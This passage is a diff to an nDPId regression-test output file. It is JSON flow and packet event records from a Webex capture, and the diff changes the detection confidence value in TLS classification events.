{"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636248,"flow_last_seen":1444570636268,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636268,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo0S1AAEAGIvEKCAABch3Ki7gMAbtSShPerbXsI1AQOQh2UQAA"} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636252,"flow_last_seen":1444570636269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636252,"flow_last_seen":1444570636269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1444570636269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636269,"pkt":"ABoRAAACABoRAAABCABFAAAo70NAAEAGj0QKCAABrfMETM36AbsKei209YXSTVAQOQjqzAAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636255,"flow_last_seen":1444570636270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636255,"flow_last_seen":1444570636270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1444570636270,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAAou9dAAEAGu0cKCAABQER5ZMv7AbtwVXklj6qG3FAQOQjlYgAA"} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636270,"flow_last_seen":1444570636270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636270,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1444570636270,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636270,"pkt":"ABoRAAACABoRAAABCABFAAA879dAAEAGBrMKCAABch3IC7rhAbtuYS0jAAAAAKACOQivZQAAAgQFtAQCCAoATML0AAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1444570636273,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636273,"pkt":"ABoRAAACABoRAAABCABFAAAoAZ9AABAGJQByHcgLCggAAQG7uuGRntLcbmEtJFAS\/\/+vAwAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636259,"flow_last_seen":1444570636273,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636273,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636259,"flow_last_seen":1444570636273,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636273,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1444570636274,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636274,"pkt":"ABoRAAACABoRAAABCABFAAAoYepAAEAGFTYKCAABQER5Y9qhAbtb96MbpAhc5lAQOQjWvQAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636264,"flow_last_seen":1444570636274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636274,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636264,"flow_last_seen":1444570636274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636274,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1444570636275,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636275,"pkt":"ABoRAAACABoRAAABCABFAAAo79hAAEAGBsYKCAABch3IC7rhAbtuYS0kkZ7S3VAQOQh1\/AAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636270,"flow_last_seen":1444570636276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636276,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636270,"flow_last_seen":1444570636276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636276,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636359,"flow_last_seen":1444570636359,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636359,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1444570636359,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636359,"pkt":"ABoRAAACABoRAAABCABFAAA86IFAAEAGnowKCAABQERpYciqAbsEZyp7AAAAAKACOQievAAAAgQFtAQCCAoATML6AAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1444570636363,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636363,"pkt":"ABoRAAACABoRAAABCABFAAAoAaNAABAGtX9ARGlhCggAAQG7yKr7mNWEBGcqfFAS\/\/8xvgAA"} @@ -112,36 +112,36 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1444570636364,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636364,"pkt":"ABoRAAACABoRAAABCABFAAA8Y+FAAEAGIywKCAABQERpYpEJAbvtraEaAAAAAKACOQh2dQAAAgQFtAQCCAoATML7AAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1444570636368,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAoAaRAABAGtX1ARGliCggAAQG7kQkSUl7l7a2hG1AS\/\/9pXgAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1444570636368,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636368,"pkt":"ABoRAAACABoRAAABCABFAAAo6IJAAEAGnp8KCAABQERpYciqAbsEZyp8+5jVhVAQOQj4tgAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636359,"flow_last_seen":1444570636368,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636368,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636359,"flow_last_seen":1444570636368,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636368,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1444570636369,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636369,"pkt":"ABoRAAACABoRAAABCABFAAAoY+JAAEAGIz8KCAABQERpYpEJAbvtraEbElJe5lAQOQgwVwAA"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636364,"flow_last_seen":1444570636369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636369,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636364,"flow_last_seen":1444570636369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636369,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636387,"flow_last_seen":1444570636387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636387,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1444570636387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636387,"pkt":"ABoRAAACABoRAAABCABFAAA82lhAAEAGrK8KCAABQERpZ6GqAbsG3RlZAAAAAKACOQjUWwAAAgQFtAQCCAoATMMBAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1444570636395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAoAadAABAGtXVARGlnCggAAQG7oar5IuamBt0ZWlAS\/\/9YuAAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1444570636395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAo2llAAEAGrMIKCAABQERpZ6GqAbsG3Rla+SLmp1AQOQgfsQAA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636387,"flow_last_seen":1444570636397,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636397,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":328,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636180,"flow_last_seen":1444570636471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636471,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":335,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636160,"flow_last_seen":1444570636701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636701,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 